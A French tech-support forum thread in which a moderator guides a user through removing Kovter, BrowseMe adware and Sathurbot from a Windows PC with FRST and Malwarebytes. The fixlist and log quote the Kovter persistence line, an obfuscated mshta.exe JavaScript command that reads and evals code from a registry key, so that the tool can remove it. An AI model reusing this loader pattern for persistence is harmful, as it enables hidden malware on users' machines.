Internet explorer se lance en tâche de fond [Résolu/Fermé]

Signaler
Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016
-
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
-
Bonjour à toutes et à tous.
Je viens vers vous car j'aurai besoin d'aide.
J'ai été infecté et depuis internet explorer se lance en tâche de fond (internet explorer est ouvert plusieurs fois), lançant le son de pages de site people, de pub ou autre. Je n'ai que le son, aucune fenêtre ne s'ouvre. Après une brève recherche, j'ai trouvé des cas similaires et j'en ai conclu que j'avais besoin d'aide car je ne sais pas faire certaines choses.
Je vais commencer par suivre les indications déjà donnés dans un autre topic concernant les rapports à envoyer (celui ci : https://forums.commentcamarche.net/forum/affich-31685916-pub-internet-en-taches-de-fond ).
Je sollicite votre assistance et je vous remercie par avance pour l'aide et le temps que vous pourrez m'accorder.

Il s'est passé quelque chose quand j'ai utilisé FRST : un message vocal s'est mis en route, me disant que mon ordinateur était infecté par un virus, qu'il s'activera dans une heure et que je devais appeler un numéro pour avoir de l'assistance (je me doute que c'est une arnaque). le message s'est répété quatre fois avant de s'arrêter.

-RAPPORTS :

Hijackthis :
https://pjjoint.malekal.com/files.php?id=HijackThis_20160901_m5w14d5k13u8

ADWCleaner :
https://pjjoint.malekal.com/files.php?id=20160901_o10y8o11x12u5

FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20160901_y8v9c9h12u6

Shorcut :
https://pjjoint.malekal.com/files.php?id=20160901_y7o9t10w7r11

Addition :
https://pjjoint.malekal.com/files.php?id=20160901_v15k15p5k9y5

Merci de votre aide.

11 réponses

Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
Salut,

Je regarde les rapports FRST.
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
Tu as une infection de type Trojan Kovter et un adware BrowseMe

Je te conseille de désinstaller Spybot, pas super efficace, selon moi. ( Adwares : Antispyware comment ne pas désinfecter son Windows )
En plus il se charge au démarrage, ce qui peut ralentir le démarrage.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-70950699-4012501783-303144643-1001\Software\Classes\7311b: "C:\Windows\system32\mshta.exe" "javascript:EWW5UTR="i";o55h=new ActiveXObject("WScript.Shell");LfaW8y3S="Fvq4ueV";f7BJx3=o55h.RegRead("HKCU\\software\\xifwzi\\bjzvi");a7YQxhHC3="mAO";eval(f7BJx3);uiJf0Oc6="R7pRYS";" <===== ATTENTION
HKU\S-1-5-21-70950699-4012501783-303144643-1001\...\Run: [**wkmvwq<*>] => "C:\Users\Bastien\AppData\Local\383bf\c9fc9.lnk" <===== ATTENTION (Nom de valeur avec caractères invalides)
C:\Users\Bastien\AppData\Roaming\BrowserMe
HKU\S-1-5-21-70950699-4012501783-303144643-1001\...\Run: [BrowserUpdate] => C:\Users\Bastien\AppData\Roaming\BrowserMe\GoogleUpdate.exe [55516160 2016-07-22] (Google Inc.)
HKU\S-1-5-21-70950699-4012501783-303144643-1001\...\Run: [BrowserMe] => C:\Users\Bastien\AppData\Roaming\BrowserMe\GoogleUpdate.exe [55516160 2016-07-22] (Google Inc.)
reg: reg delete "HKCU\Software\xifwzi\bjzvi"
Startup: C:\Users\Bastien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4edba.lnk [2016-08-13]
Startup: C:\Users\Bastien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\74d2c.lnk [2016-08-13]
C:\Users\Bastien\AppData\Roaming\BrowserMe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016

Après redémarrage, il semblerait que le problème soit résolu. Merci beaucoup

Je vous poste le fixlog :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 31-08-2016
Exécuté par Bastien (01-09-2016 15:38:43) Run:2
Exécuté depuis C:\Users\Bastien\Desktop
Profils chargés: Bastien (Profils disponibles: Bastien)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-70950699-4012501783-303144643-1001\Software\Classes\7311b: "C:\Windows\system32\mshta.exe" "javascript:EWW5UTR="i";o55h=new ActiveXObject("WScript.Shell");LfaW8y3S="Fvq4ueV";f7BJx3=o55h.RegRead("HKCU\\software\\xifwzi\\bjzvi");a7YQxhHC3="mAO";eval(f7BJx3);uiJf0Oc6="R7pRYS";" <===== ATTENTION
HKU\S-1-5-21-70950699-4012501783-303144643-1001\...\Run: [**wkmvwq<*>] => "C:\Users\Bastien\AppData\Local\383bf\c9fc9.lnk" <===== ATTENTION (Nom de valeur avec caractères invalides)
C:\Users\Bastien\AppData\Roaming\BrowserMe
HKU\S-1-5-21-70950699-4012501783-303144643-1001\...\Run: [BrowserUpdate] => C:\Users\Bastien\AppData\Roaming\BrowserMe\GoogleUpdate.exe [55516160 2016-07-22] (Google Inc.)
HKU\S-1-5-21-70950699-4012501783-303144643-1001\...\Run: [BrowserMe] => C:\Users\Bastien\AppData\Roaming\BrowserMe\GoogleUpdate.exe [55516160 2016-07-22] (Google Inc.)
reg: reg delete "HKCU\Software\xifwzi\bjzvi"
Startup: C:\Users\Bastien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4edba.lnk [2016-08-13]
Startup: C:\Users\Bastien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\74d2c.lnk [2016-08-13]
C:\Users\Bastien\AppData\Roaming\BrowserMe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-70950699-4012501783-303144643-1001\Software\Classes\7311b => clé non trouvé(e).
HKU\S-1-5-21-70950699-4012501783-303144643-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**wkmvwq<*> => valeur non trouvé(e).
"C:\Users\Bastien\AppData\Roaming\BrowserMe" => non trouvé(e).
HKU\S-1-5-21-70950699-4012501783-303144643-1001\Software\Microsoft\Windows\CurrentVersion\Run\\BrowserUpdate => valeur non trouvé(e).
HKU\S-1-5-21-70950699-4012501783-303144643-1001\Software\Microsoft\Windows\CurrentVersion\Run\\BrowserMe => valeur supprimé(es) avec succès

========= reg delete "HKCU\Software\xifwzi\bjzvi" =========
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
change tes mots de passe puis :

MalwareBytes ( durée : environ 40min de scan ):
==================================================
Télécharge et installe MBAM. La version gratuite permet de nettoyer ( décoche bien la proposition d'essai de la version Premium à la fin de l'installation ) :

Mettre MBAM à jour puis lancer un examen.
A la fin du scan, clique sur "Supprimer Sélection" en bas à gauche.
Redémarrer l'ordinateur si nécessaire puis relancer Malwarebytes.
Vas chercher le rapport dans l'onglet "Historique".

A gauche "Journal d'analyse", double-clique sur l'examen dans la liste. Puis en bas "Copier dans le presse papier", va sur http://pjjoint.malekal.com/, clique droit "Coller" pour coller le contenu du rapport du scan. Clique sur "Envoyer". Dans un nouveau message ici en réponse, donne le lien pjjoint afin de pouvoir consulter le rapport.

Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016

J'ai un autre soucis:
Il y a mystérieusement plus de place sur mon disque C:, j'ignore pourquoi.

Et quand je veux télécharger Malwarebytes, j'ai ce message :
"C:\Users\Bastien\AppData\Local\Temp\+enqPsck.exe.part ne pourra être enregistré car le fichier source ne peut être lu."
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
il restait pas des masses :

Drive c: (système ) (Fixed) (Total:100.1 GB) (Free:3.1 GB) NTFS

Vu que tu as utorrent, regarde dans tes téléchargements.
Désinstalle Spybot et McAfee Security scan aussi...
Servent à rien.

~~

Pour libérer de l’espace disque:
Touche Windows + R
Saisir cleanmgr
Fais le nettoyage.

Il te faut ensuite vérifier ce qui prend de la place anormalement avec les outils proposés dans le lien précédent.

Quelques pistes à vérifier mentionnées dans le lien :
- Fais du ménage avec le programme de nettoyage Windows.
- Si l'espace est toujours manquant, installe un des logiciels préconisé pour voir ce qui en utilise le plus et trouver une utilisation anormale (il peut arriver que ce soit l'antivirus qui déconne).
- Vérifie les mauvaises configurations, de la Restauration du Système, Antivirus, etc... ( suivre le le tutoriel )
- ou la mise à jour Windows 10.

Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016

En redémarrant l'ordi il y avait pourtant de la place (5 Go quand j'ai regardé). Pas énorme mais quand même. Je ne sais pas ce qui pourrait pomper autant d'espace.
Je vais faire ce que tu dis et essayer de trouver une solution. Merci pour ton aide.
Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016

J'ai libéré 2 Go. Mais je perd de l'espace comme si quelque chose le remplissait. Je vois mon espace diminuer à vu d'oeil.

Il y a un fichier dans le dossier temporaire qui prend de plus en plus de place (là il est à 6,80 Go) : regg00. Je ne peux pas le supprimer car reg.exe est ouvert.

Edit :
J'ai réussi à fermer reg.exe et j'ai pu effacer reg00. J'ai libéré 7 Go. Pour l'instant tout semble stable
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
Voir mon message précédent, regarde ce qui prends de la place avec les outils proposés.
Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016

Voici le journal de Malwarbytes:

https://pjjoint.malekal.com/files.php?id=20160901_p15w5t15s8t13

Sinon pour l'autre problème, j'ai l'impression que c'est bon. Je vais quand même faire ce que tu me dis de faire.
En tout cas merci beaucoup pour ton aide! T'as été super rapide et clair! Merci!
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
Sathurbot aussi...

Trojan.SathurBot, C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll, Supprimer au redémarrage, [8c6ff3792476cc6a6afe63349a68c23e],
Trojan.Crypt, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp665F.exe, En quarantaine, [887338345248c1754aba09bfbb49b848],
Backdoor.Bot, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6D94.exe, En quarantaine, [56a55616108a74c2d6b20ac209fb8e72],
Backdoor.Andromeda, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB48F.exe, En quarantaine, [ad4e3a324b4f93a35cb65e6f52b27789],
Trojan.SathurBot, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\zepplauncher.mif, En quarantaine, [11ea74f825758da95219982e4db54fb1],


Change bien tes mots de passe et fais des analyses antivir et Malwarebytes ces prochains jours.

Renforce la sécurité de ton Windows : Comment sécuriser mon Windows
Notamment contre les Web exploits.
Messages postés
7
Date d'inscription
jeudi 1 septembre 2016
Statut
Membre
Dernière intervention
1 septembre 2016

Merci pour les tutos et pour ton aide. Je regarde le tuto de protection de l'ordinateur.
J'ai changé mes mots de passe.

Merci Beaucoup!
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 095
de rien =)